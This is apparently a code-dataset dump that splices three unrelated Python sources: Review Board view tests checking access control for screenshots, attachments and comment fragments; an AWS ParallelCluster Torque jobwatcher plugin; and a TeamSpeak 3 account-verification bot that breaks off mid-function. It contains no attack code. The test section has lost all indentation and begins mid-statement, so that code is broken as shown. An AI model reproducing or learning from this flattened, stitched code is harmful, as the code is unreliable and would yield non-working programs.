}))
self.assertEqual(response.status_code, 404)
def test_view_screenshot_access_with_invalid_inactive_id_and_draft(self):
"""Testing view_screenshot access with invalid inactive screenshot
for review request draft
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request, draft=True,
active=False)
review_request2 = self.create_review_request(publish=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request2.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 404)
def test_review_file_attachment_access_with_valid_id(self):
"""Testing review_file_attachment access with valid attachment for
review request
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 200)
def test_review_file_attachment_access_with_valid_id_and_draft(self):
"""Testing review_file_attachment access with valid attachment for
review request draft
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request, draft=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 200)
def test_review_file_attachment_access_with_invalid_id(self):
"""Testing review_file_attachment access with invalid attachment for
review request
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request)
review_request2 = self.create_review_request(publish=True)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request2.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 404)
def test_review_file_attachment_access_with_invalid_id_and_draft(self):
"""Testing review_file_attachment access with invalid attachment for
review request draft
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request, draft=True)
review_request2 = self.create_review_request(publish=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request2.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 404)
def test_review_file_attachment_access_with_valid_inactive_id(self):
"""Testing review_file_attachment access with valid inactive
attachment for review request
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request, active=False)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 200)
def test_review_file_attachment_access_with_valid_inactive_id_draft(self):
"""Testing review_file_attachment access with valid inactive
attachment for review request draft
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request, draft=True,
active=False)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 200)
def test_review_file_attachment_access_with_invalid_inactive_id(self):
"""Testing review_file_attachment access with invalid inactive
attachment for review request
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request, active=False)
review_request2 = self.create_review_request(publish=True)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request2.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 404)
def test_review_file_attachment_access_invalid_inactive_id_draft(self):
"""Testing review_file_attachment access with invalid inactive
attachment for review request draft
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request, draft=True,
active=False)
review_request2 = self.create_review_request(publish=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request2.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 404)
def test_review_file_attachment_access_with_valid_diff_against_id(self):
"""Testing review_file_attachment access with valid diff-against
attachment for review request
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request)
attachment2 = self.create_file_attachment(review_request)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
'file_attachment_diff_id': attachment2.pk,
}))
self.assertEqual(response.status_code, 200)
def test_review_file_attachment_access_valid_diff_against_id_draft(self):
"""Testing review_file_attachment access with valid diff-against
attachment for review request draft
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request)
attachment2 = self.create_file_attachment(review_request, draft=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
'file_attachment_diff_id': attachment2.pk,
}))
self.assertEqual(response.status_code, 200)
def test_review_file_attachment_access_with_invalid_diff_against_id(self):
"""Testing review_file_attachment access with invalid diff-against
attachment for review request
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request)
review_request2 = self.create_review_request(publish=True)
attachment2 = self.create_file_attachment(review_request2)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
'file_attachment_diff_id': attachment2.pk,
}))
self.assertEqual(response.status_code, 404)
def test_review_file_attachment_access_invalid_diff_against_id_draft(self):
"""Testing review_file_attachment access with invalid diff-against
attachment for review request draft
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request)
review_request2 = self.create_review_request(publish=True)
attachment2 = self.create_file_attachment(review_request2, draft=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
'file_attachment_diff_id': attachment2.pk,
}))
self.assertEqual(response.status_code, 404)
def _get_context_var(self, response, varname):
for context in response.context:
if varname in context:
return context[varname]
return None
class CommentDiffFragmentsViewTests(TestCase):
"""Unit tests for the comment_diff_fragments view."""
fixtures = ['test_users', 'test_scmtools']
def test_get_with_unpublished_review_request_not_owner(self):
"""Testing comment_diff_fragments with unpublished review request and
user is not the owner
"""
user = User.objects.create(username='reviewer')
review_request = self.create_review_request(create_repository=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user)
comment1 = self.create_diff_comment(review, filediff)
comment2 = self.create_diff_comment(review, filediff)
review.publish()
response = self.client.get(
'/r/%d/fragments/diff-comments/%d,%d/'
% (review_request.pk, comment1.pk, comment2.pk))
self.assertEqual(response.status_code, 403)
def test_get_with_unpublished_review_request_owner(self):
"""Testing comment_diff_fragments with unpublished review request and
user is the owner
"""
user = User.objects.create_user(username='test-user',
password='<PASSWORD>')
review_request = self.create_review_request(create_repository=True,
submitter=user)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user)
comment1 = self.create_diff_comment(review, filediff)
comment2 = self.create_diff_comment(review, filediff)
review.publish()
self.assertTrue(self.client.login(username='test-user',
password='<PASSWORD>'))
response = self.client.get(
'/r/%d/fragments/diff-comments/%d,%d/'
% (review_request.pk, comment1.pk, comment2.pk))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['comment_entries']), 2)
self.assertEqual(response.context['comment_entries'][0]['comment'],
comment1)
self.assertEqual(response.context['comment_entries'][1]['comment'],
comment2)
@add_fixtures(['test_site'])
def test_get_with_published_review_request_local_site_access(self):
"""Testing comment_diff_fragments with published review request on
a Local Site the user has access to
"""
user = User.objects.create_user(username='test-user',
password='<PASSWORD>')
review_request = self.create_review_request(create_repository=True,
with_local_site=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request)
comment1 = self.create_diff_comment(review, filediff)
comment2 = self.create_diff_comment(review, filediff)
review.publish()
review_request.local_site.users.add(user)
self.assertTrue(self.client.login(username='test-user',
password='<PASSWORD>'))
response = self.client.get(
'/s/local-site-1/r/%d/fragments/diff-comments/%d,%d/'
% (review_request.display_id, comment1.pk, comment2.pk))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['comment_entries']), 2)
self.assertEqual(response.context['comment_entries'][0]['comment'],
comment1)
self.assertEqual(response.context['comment_entries'][1]['comment'],
comment2)
@add_fixtures(['test_site'])
def test_get_with_published_review_request_local_site_no_access(self):
"""Testing comment_diff_fragments with published review request on
a Local Site the user does not have access to
"""
User.objects.create_user(username='test-user',
password='<PASSWORD>')
review_request = self.create_review_request(create_repository=True,
with_local_site=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request)
comment1 = self.create_diff_comment(review, filediff)
comment2 = self.create_diff_comment(review, filediff)
review.publish()
self.assertTrue(self.client.login(username='test-user',
password='<PASSWORD>'))
response = self.client.get(
'/s/local-site-1/r/%d/fragments/diff-comments/%d,%d/'
% (review_request.display_id, comment1.pk, comment2.pk))
self.assertEqual(response.status_code, 403)
def test_get_with_valid_comment_ids(self):
"""Testing comment_diff_fragments with valid comment ID"""
user = User.objects.create(username='reviewer')
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user)
comment1 = self.create_diff_comment(review, filediff)
comment2 = self.create_diff_comment(review, filediff)
review.publish()
response = self.client.get(
'/r/%d/fragments/diff-comments/%d,%d/'
% (review_request.pk, comment1.pk, comment2.pk))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['comment_entries']), 2)
self.assertEqual(response.context['comment_entries'][0]['comment'],
comment1)
self.assertEqual(response.context['comment_entries'][1]['comment'],
comment2)
def test_get_with_valid_and_invalid_comment_ids(self):
"""Testing comment_diff_fragments with mix of valid comment IDs and
comment IDs not found in database
"""
user = User.objects.create(username='reviewer')
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user)
comment = self.create_diff_comment(review, filediff)
review.publish()
response = self.client.get(
'/r/%d/fragments/diff-comments/999,%d/'
% (review_request.pk, comment.pk))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['comment_entries']), 1)
self.assertEqual(response.context['comment_entries'][0]['comment'],
comment)
def test_get_with_no_valid_comment_ids(self):
"""Testing comment_diff_fragments with no valid comment IDs"""
review_request = self.create_review_request(create_repository=True,
publish=True)
response = self.client.get(
'/r/%d/fragments/diff-comments/100,200,300/'
% review_request.pk)
self.assertEqual(response.status_code, 404)
def test_get_with_comment_ids_from_other_review_request(self):
"""Testing comment_diff_fragments with comment ID from another review
request
"""
user = User.objects.create(username='reviewer')
# Create the first review request and review.
review_request1 = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request1)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request1, user=user)
comment1 = self.create_diff_comment(review, filediff)
review.publish()
# Create the second review request and review.
review_request2 = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request2)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request2, user=user)
comment2 = self.create_diff_comment(review, filediff)
review.publish()
response = self.client.get(
'/r/%d/fragments/diff-comments/%d,%d/'
% (review_request1.pk, comment1.pk, comment2.pk))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['comment_entries']), 1)
self.assertEqual(response.context['comment_entries'][0]['comment'],
comment1)
def test_get_with_comment_ids_from_draft_review_owner(self):
"""Testing comment_diff_fragments with comment ID from draft review,
accessed by the review's owner
"""
user = User.objects.create_user(username='reviewer',
password='<PASSWORD>')
review_request1 = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request1)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request1, user=user)
comment = self.create_diff_comment(review, filediff)
self.assertTrue(self.client.login(username='reviewer',
password='<PASSWORD>'))
response = self.client.get(
'/r/%d/fragments/diff-comments/%d/'
% (review_request1.pk, comment.pk))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['comment_entries']), 1)
self.assertEqual(response.context['comment_entries'][0]['comment'],
comment)
def test_get_with_comment_ids_from_draft_review_not_owner(self):
"""Testing comment_diff_fragments with comment ID from draft review,
accessed by someone other than the review's owner
"""
user = User.objects.create(username='reviewer')
review_request1 = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request1)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request1, user=user)
comment = self.create_diff_comment(review, filediff)
response = self.client.get(
'/r/%d/fragments/diff-comments/%d/'
% (review_request1.pk, comment.pk))
self.assertEqual(response.status_code, 404)
class DownloadFileTests(TestCase):
"""Tests for the download_*_file views."""
fixtures = ['test_users', 'test_scmtools']
@classmethod
def setUpClass(cls):
super(DownloadFileTests, cls).setUpClass()
register_hosting_service(TestService.name, TestService)
@classmethod
def tearDownClass(cls):
super(DownloadFileTests, cls).tearDownClass()
unregister_hosting_service(TestService.name)
def setUp(self):
super(DownloadFileTests, self).setUp()
self.account = HostingServiceAccount.objects.create(
service_name=TestService.name,
hosting_url='http://example.com/',
username='foo')
self.repository = self.create_repository(hosting_account=self.account)
self.review_request = self.create_review_request(
repository=self.repository, publish=True)
self.diffset = self.create_diffset(review_request=self.review_request)
self.filediff = self.create_filediff(self.diffset,
source_file='/invalid-path',
dest_file='/invalid-path')
    def test_download_orig_file_404(self):
"""Testing download_orig_file when the file cannot be found upstream"""
rsp = self.client.get(
local_site_reverse('download-orig-file', kwargs={
'review_request_id': self.review_request.display_id,
'revision': self.diffset.revision,
'filediff_id': self.filediff.pk,
}))
        self.assertEqual(rsp.status_code, 404)
    def test_download_modified_file_404(self):
"""Testing download_modified_file when the file cannot be found
upstream
"""
rsp = self.client.get(
local_site_reverse('download-modified-file', kwargs={
'review_request_id': self.review_request.display_id,
'revision': self.diffset.revision,
'filediff_id': self.filediff.pk,
}))
        self.assertEqual(rsp.status_code, 404)
class UserInfoboxTests(TestCase):
def test_unicode(self):
"""Testing user_infobox with a user with non-ascii characters"""
user = User.objects.create_user('test', '<EMAIL>')
user.first_name = 'Test\u21b9'
user.last_name = 'User\u2729'
user.save()
self.client.get(local_site_reverse('user-infobox', args=['test']))
```
|
{
"source": "jeyarajsiddhu/aws-parallelcluster-node",
"score": 2
}
|
#### File: jobwatcher/plugins/torque.py
```python
import logging
from common.schedulers.torque_commands import get_compute_nodes_info, get_pending_jobs_info
from .utils import get_optimal_nodes
log = logging.getLogger(__name__)
# get nodes requested from pending jobs
def get_required_nodes(instance_properties, max_size):
pending_jobs = get_pending_jobs_info(max_slots_filter=instance_properties.get("slots"))
logging.info("Found the following pending jobs:\n%s", pending_jobs)
slots_requested = []
nodes_requested = []
for job in pending_jobs:
if job.resources_list.nodes_resources:
for nodes, ppn in job.resources_list.nodes_resources:
nodes_requested.append(nodes)
slots_requested.append(ppn * nodes)
elif job.resources_list.ncpus:
nodes_requested.append(1)
slots_requested.append(job.resources_list.ncpus)
elif job.resources_list.nodes_count:
nodes_requested.append(job.resources_list.nodes_count)
slots_requested.append(1 * job.resources_list.nodes_count)
return get_optimal_nodes(nodes_requested, slots_requested, instance_properties)
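# Illustrative sketch, not part of the original plugin: for a hypothetical queue holding
# one job submitted with "nodes=2:ppn=4" and one job with "ncpus=3", the loop above builds
# nodes_requested = [2, 1] and slots_requested = [8, 3]. Both lists are then handed to
# get_optimal_nodes() together with instance_properties, which is assumed to expose the
# per-instance slot count under the "slots" key (the same key used in the filter above).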
# get nodes reserved by running jobs
def get_busy_nodes():
nodes = get_compute_nodes_info()
logging.info("Found the following compute nodes:\n%s", nodes)
busy_nodes = 0
for node in nodes.values():
# when a node is added it transitions from down,offline,MOM-list-not-sent -> down -> free
if node.jobs or (
any(state in ["state-unknown"] for state in node.state) and "MOM-list-not-sent" not in node.state
):
busy_nodes += 1
return busy_nodes
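# Illustrative reading of the check above (not original code): a node with running jobs
# always counts as busy; a node without jobs counts only when it reports "state-unknown"
# and has already dropped the "MOM-list-not-sent" marker, so nodes that are still joining
# the cluster are ignored.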
```
|
{
"source": "Jeybla/ts-gw2-verifyBot",
"score": 2
}
|
#### File: Jeybla/ts-gw2-verifyBot/TS3Bot.py
```python
import binascii # crc32
import datetime # for date strings
import json
import os # operating system commands -check if files exist
import re # command matching in Bot.commandCheck()
import sqlite3 # Database
import traceback
import urllib.parse # for fetching guild emblems urls
from threading import RLock
import requests # to download guild emblems
import schedule # Allows auditing of users every X days
import ts3 # teamspeak library
import Config
import TS3Auth # GW2 account verification (TS3Auth.AuthRequest is used during audits)
from StringShortener import StringShortener
from bot_messages import * # Import all Static messages the BOT may need
import Logger
log = Logger.getLogger()
def request(url):
response = requests.get(url, headers={"Content-Type": "application/json"})
if response.status_code == 200:
return json.loads(response.content.decode("utf-8"))
else:
return None
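# Usage sketch (illustrative, not part of the original file): the GW2 endpoints queried
# further below return parsed JSON on HTTP 200 and None otherwise, so callers can branch
# on the result directly, e.g.:
#   ids = request("https://api.guildwars2.com/v2/guild/search?name=Example%20Guild")
#   if ids:
#       guild_info = request("https://api.guildwars2.com/v2/guild/%s" % ids[0])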
#######################################
def default_exception_handler(ex):
''' prints the trace and returns the exception for further inspection '''
traceback.print_exc()
return ex
def ignore_exception_handler(ex):
''' acts as if no exception was raised, equivalent to except: pass'''
return None
def signal_exception_handler(ex):
''' returns the exception without printing it, useful for expected exceptions, signaling that an exception occurred '''
return ex
#######################################
## Basic Classes
#######################################
class ThreadsafeDBConnection(object):
def __init__(self, db_name):
self.db_name = db_name
self.conn = sqlite3.connect(db_name, check_same_thread = False, detect_types = sqlite3.PARSE_DECLTYPES)
self.cursor = self.conn.cursor()
self.lock = RLock()
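# Minimal usage sketch for the wrapper above (illustrative; the file name is made up):
#   dbc = ThreadsafeDBConnection("ts_registration.db")
#   with dbc.lock:
#       rows = dbc.cursor.execute("SELECT * FROM users").fetchall()
#       dbc.conn.commit()
# This lock-then-cursor pattern is how the connection is used throughout the Bot class below.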
class ThreadsafeTSConnection(object):
RETRIES = 3
@property
def uri(self):
return "telnet://%s:%s@%s:%s" % (self._user, self._password, self._host, str(self._port))
def __init__(self, user, password, host, port, keepalive_interval = None, server_id = None, bot_nickname = None):
'''
Creates a new threadsafe TS3 connection.
user: user to connect as
password: <PASSWORD>
host: host of TS3 server
port: port for server queries
keepalive_interval: interval in which the keepalive is sent to the ts3 server
server_id: the server id of the TS3 server we want to address, in case we have multiple.
Note that the server id HAS to be selected at some point, using the "use" command.
It has just been wrapped in here to allow for more convenient copying of the
TS3 connection where the appropriate server is selected automatically.
bot_nickname: nickname for the bot. Could be suffixed, see gentleRename. If None is passed,
no naming will take place.
'''
self._user = user
self._password = password
self._host = host
self._port = port
self._keepalive_interval = int(keepalive_interval)
self._server_id = server_id
self._bot_nickname = bot_nickname
self.lock = RLock()
self.ts_connection = None # done in init()
self.init()
def init(self):
if self.ts_connection is not None:
try:
self.ts_connection.close()
except:
pass # may already be closed, doesn't matter.
self.ts_connection = ts3.query.TS3ServerConnection(self.uri)
if self._keepalive_interval is not None:
schedule.cancel_job(self.keepalive) # to avoid accumulating keepalive calls during re-inits
schedule.every(self._keepalive_interval).seconds.do(self.keepalive)
if self._server_id is not None:
self.ts3exec(lambda tc: tc.exec_("use", sid=self._server_id))
if self._bot_nickname is not None:
self.forceRename(self._bot_nickname)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def keepalive(self):
self.ts3exec(lambda tc: tc.send_keepalive())
def ts3exec(self, handler, exception_handler = lambda ex: default_exception_handler(ex)): #eh = lambda ex: print(ex)):
'''
        Executes a query() or exec_() on the internal TS3 connection.
handler: a function ts3.query.TS3ServerConnection -> any
exception_handler: a function Exception -> any. None will be interpreted as not having encountered an exception.
The default handler prints the stacktrace for the exception and returns the exception itself.
This changes the workflow of executing erroring code: instead of try-catching we need to
decompose the tuple returned from this function and check if the exception result is anything
but None. E.g.:
try:
res = ts3con.query(...)
except Exception as ex:
# error handling
becomes
res,ex = threadsafe_ts3con.ts3exec(lambda tc: tc.query(...))
if ex:
# error handling
Note that the exception handler is only executed iff an exception is actually
being handled!
returns a tuple with the results of the two handlers (result first, exception result second).
'''
reinit = False
with self.lock:
failed = True
fails = 0
res = None
exres = None
while failed and fails < ThreadsafeTSConnection.RETRIES:
failed = False
try:
res = handler(self.ts_connection)
except ts3.query.TS3TransportError:
failed = True
fails += 1
log.error("Critical error on transport level! Attempt %s to restart the connection and send the command again.", str(fails),)
reinit = True
except Exception as ex:
exres = exception_handler(ex)
if reinit:
self.init()
return (res, exres)
def close(self):
self.ts3exec(lambda tc: tc.close())
def copy(self):
tsc = ThreadsafeTSConnection(self._user, self._password, self._host, self._port, self._keepalive_interval, self._server_id, None)
# make sure to
# 1. not pass bot_nickname to the constructor, or the child (copy) would call forceRename and attempt to kick the parent
# 2. gently rename the copy afterwards
tsc.gentleRename(self._bot_nickname)
return tsc
def gentleRename(self, nickname):
'''
Renames self to nickname, but attaches a running counter
to the name if the nickname is already taken.
'''
i = 1
new_nick = "%s(%d)" % (nickname,i)
while not self.ts3exec(lambda tc: tc.query("clientfind", pattern=new_nick).first(), signal_exception_handler)[1]:
i += 1
new_nick = "%s(%d)" % (nickname,i)
new_nick = "%s(%d)" % (nickname,i)
self.ts3exec(lambda tc: tc.exec_("clientupdate", client_nickname=new_nick))
self._bot_nickname = new_nick;
return self._bot_nickname
def forceRename(self, nickname):
'''
Attempts to forcefully rename self.
If the chosen nickname is already taken, the bot will attempt to kick that user.
If that fails the bot will fall back to gentle renaming itself.
'''
imposter,free = self.ts3exec(lambda tc: tc.query("clientfind", pattern=nickname).first(), signal_exception_handler) # check if nickname is already in use
if not free: # error occurs if no such user was found -> catching no exception means the name is taken
_,ex = self.ts3exec(lambda tc: tc.exec_("clientkick", reasonid=5, reasonmsg="Reserved Nickname", clid=imposter.get("clid")), signal_exception_handler)
if ex:
log.warning("Renaming self to '%s' after kicking existing user with reserved name failed. Warning: this usually only happens for serverquery logins, meaning you are running multiple bots or you are having stale logins from crashed bot instances on your server. Only restarts can solve the latter.", nickname)
else:
log.info("Kicked user who was using the reserved registration bot name '%s'.", nickname)
nickname = self.gentleRename(nickname)
log.info("Renamed self to '%s'.", nickname)
else:
self.ts3exec(lambda tc: tc.exec_("clientupdate", client_nickname=nickname))
log.info("Forcefully renamed self to '%s'.", nickname)
self._bot_nickname = nickname
return self._bot_nickname
class Bot:
@property
def ts_connection(self):
return self._ts_connection
def __init__(self, db, ts_connection, verified_group, bot_nickname = "TS3BOT"):
self._ts_connection = ts_connection
admin_data, ex = self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("whoami").first())
self.db_name = db
self.name = admin_data.get('client_login_name')
self.client_id = admin_data.get('client_id')
self.nickname = self.ts_connection.forceRename(bot_nickname)
self.verified_group = verified_group
self.vgrp_id = self.groupFind(verified_group)
self.getUserDatabase()
self.c_audit_date = datetime.date.today() # Todays Date
#Helps find the group ID for a group name
def groupFind(self, group_to_find):
self.groups_list, ex = self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("servergrouplist").all())
for group in self.groups_list:
if group.get('name') == group_to_find:
return group.get('sgid')
return -1
def clientNeedsVerify(self, unique_client_id):
client_db_id = self.getTsDatabaseID(unique_client_id)
#Check if user is in verified group
if any(perm_grp.get('name') == self.verified_group for perm_grp in self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("servergroupsbyclientid", cldbid = client_db_id).all())[0]):
return False #User already verified
#Check if user is authenticated in database and if so, re-adds them to the group
with self.dbc.lock:
current_entries = self.dbc.cursor.execute("SELECT * FROM users WHERE ts_db_id=?", (unique_client_id,)).fetchall()
if len(current_entries) > 0:
self.setPermissions(unique_client_id)
return False
return True #User not verified
def setPermissions(self, unique_client_id):
try:
client_db_id = self.getTsDatabaseID(unique_client_id)
log.debug("Adding Permissions: CLUID [%s] SGID: %s CLDBID: %s", unique_client_id, self.vgrp_id, client_db_id)
#Add user to group
_,ex = self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("servergroupaddclient", sgid = self.vgrp_id, cldbid = client_db_id))
if ex:
log.error("Unable to add client to '%s' group. Does the group exist?", self.verified_group)
except ts3.query.TS3QueryError as err:
log.error("Setting permissions failed: %s", err) #likely due to bad client id
def removePermissions(self, unique_client_id):
try:
client_db_id = self.getTsDatabaseID(unique_client_id)
log.debug("Removing Permissions: CLUID [%s] SGID: %s CLDBID: %s", unique_client_id, self.vgrp_id, client_db_id)
#Remove user from group
_,ex = self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("servergroupdelclient", sgid = self.vgrp_id, cldbid = client_db_id), signal_exception_handler)
if ex:
log.error("Unable to remove client from '%s' group. Does the group exist and are they member of the group?", self.verified_group)
#Remove users from all groups, except the whitelisted ones
if Config.purge_completely:
# FIXME: remove channel groups as well
assigned_groups, ex = self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("servergroupsbyclientid", cldbid = client_db_id).all())
for g in assigned_groups:
if g.get("name") not in Config.purge_whitelist:
self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("servergroupdelclient", sgid = g.get("sgid"), cldbid = client_db_id), lambda ex: None)
except ts3.query.TS3QueryError as err:
log.error("Removing permissions failed: %s", err) #likely due to bad client id
def removePermissionsByGW2Account(self, gw2account):
with self.dbc.lock:
tsDbIds = self.dbc.cursor.execute("SELECT ts_db_id FROM users WHERE account_name = ?", (gw2account,)).fetchall()
for tdi, in tsDbIds:
self.removePermissions(tdi)
log.debug("Removed permissions from %s", tdi)
self.dbc.cursor.execute("DELETE FROM users WHERE account_name = ?", (gw2account,))
changes = self.dbc.cursor.execute("SELECT changes()").fetchone()[0];
self.dbc.conn.commit()
return changes
def getUserDBEntry(self, client_unique_id):
'''
Retrieves the DB entry for a unique client ID.
Is either a dictionary of database-field-names to values, or None if no such entry was found in the DB.
'''
with self.dbc.lock:
entry = self.dbc.cursor.execute("SELECT * FROM users WHERE ts_db_id=?", (client_unique_id,)).fetchall()
if len(entry) < 1:
# user not registered
return None
entry = entry[0]
keys = self.dbc.cursor.description
assert len(entry) == len(keys)
return dict([(keys[i][0], entry[i]) for i in range(len(entry))])
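    # Illustrative result shape (not from the original source): for a registered user the
    # returned mapping mirrors the columns of the users table created below, e.g.
    #   {"ts_db_id": "<unique client id>", "account_name": "Foo.1234",
    #    "api_key": "<api key>", "created_date": ..., "last_audit_date": ...}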
def getUserDatabase(self):
if os.path.isfile(self.db_name):
self.dbc = ThreadsafeDBConnection(self.db_name) # sqlite3.connect(self.db_name, check_same_thread = False, detect_types = sqlite3.PARSE_DECLTYPES)
log.info("Loaded User Database...")
else:
self.dbc = ThreadsafeDBConnection(self.db_name) # sqlite3.connect(self.db_name, check_same_thread = False, detect_types = sqlite3.PARSE_DECLTYPES)
# self.dbc.cursor = self.dbc.conn.cursor()
log.info("No User Database found...created new database!")
with self.dbc.lock:
# USERS
self.dbc.cursor.execute("CREATE TABLE users(ts_db_id text primary key, account_name text, api_key text, created_date date, last_audit_date date)")
# BOT INFO
self.dbc.cursor.execute("CREATE TABLE bot_info(version text, last_succesful_audit date)")
self.dbc.conn.commit()
self.dbc.cursor.execute('INSERT INTO bot_info (version, last_succesful_audit) VALUES (?,?)', (Config.current_version, datetime.date.today(), ))
self.dbc.conn.commit()
# GUILD INFO
self.dbc.cursor.execute('''CREATE TABLE guilds(
guild_id integer primary key autoincrement,
guild_name text UNIQUE,
ts_group text UNIQUE)''')
self.dbc.conn.commit()
# GUILD IGNORES
self.dbc.cursor.execute('''CREATE TABLE guild_ignores(
guild_ignore_id integer primary key autoincrement,
guild_id integer,
ts_db_id text,
ts_name text,
FOREIGN KEY(guild_id) REFERENCES guilds(guild_id),
UNIQUE(guild_id, ts_db_id))''')
self.dbc.conn.commit()
def TsClientLimitReached(self, gw_acct_name):
with self.dbc.lock:
current_entries = self.dbc.cursor.execute("SELECT * FROM users WHERE account_name=?", (gw_acct_name, )).fetchall()
return len(current_entries) >= Config.client_restriction_limit
def addUserToDB(self, client_unique_id, account_name, api_key, created_date, last_audit_date):
with self.dbc.lock:
client_id = self.getActiveTsUserID(client_unique_id)
client_exists = self.dbc.cursor.execute("SELECT * FROM users WHERE ts_db_id=?", (client_unique_id,)).fetchall()
if len(client_exists) > 1:
log.warning("Found multiple database entries for single unique teamspeakid %s.", client_unique_id)
if len(client_exists) != 0: # If client TS database id is in BOT's database.
self.dbc.cursor.execute("""UPDATE users SET ts_db_id=?, account_name=?, api_key=?, created_date=?, last_audit_date=? WHERE ts_db_id=?""", (client_unique_id, account_name, api_key, created_date, last_audit_date, client_unique_id))
log.info("Teamspeak ID %s already in Database updating with new Account Name '%s'. (likely permissions changed by a Teamspeak Admin)", client_unique_id, account_name)
else:
self.dbc.cursor.execute("INSERT INTO users ( ts_db_id, account_name, api_key, created_date, last_audit_date) VALUES(?,?,?,?,?)",(client_unique_id, account_name, api_key, created_date, last_audit_date))
self.dbc.conn.commit()
def removeUserFromDB(self, client_db_id):
with self.dbc.lock:
self.dbc.cursor.execute("DELETE FROM users WHERE ts_db_id=?", (client_db_id,))
self.dbc.conn.commit()
#def updateGuildTags(self, client_db_id, auth):
def updateGuildTags(self, user, auth):
if auth.guilds_error:
log.error("Did not update guild groups for player '%s', as loading the guild groups caused an error.", auth.name)
return
uid = user.unique_id # self.getTsUniqueID(client_db_id)
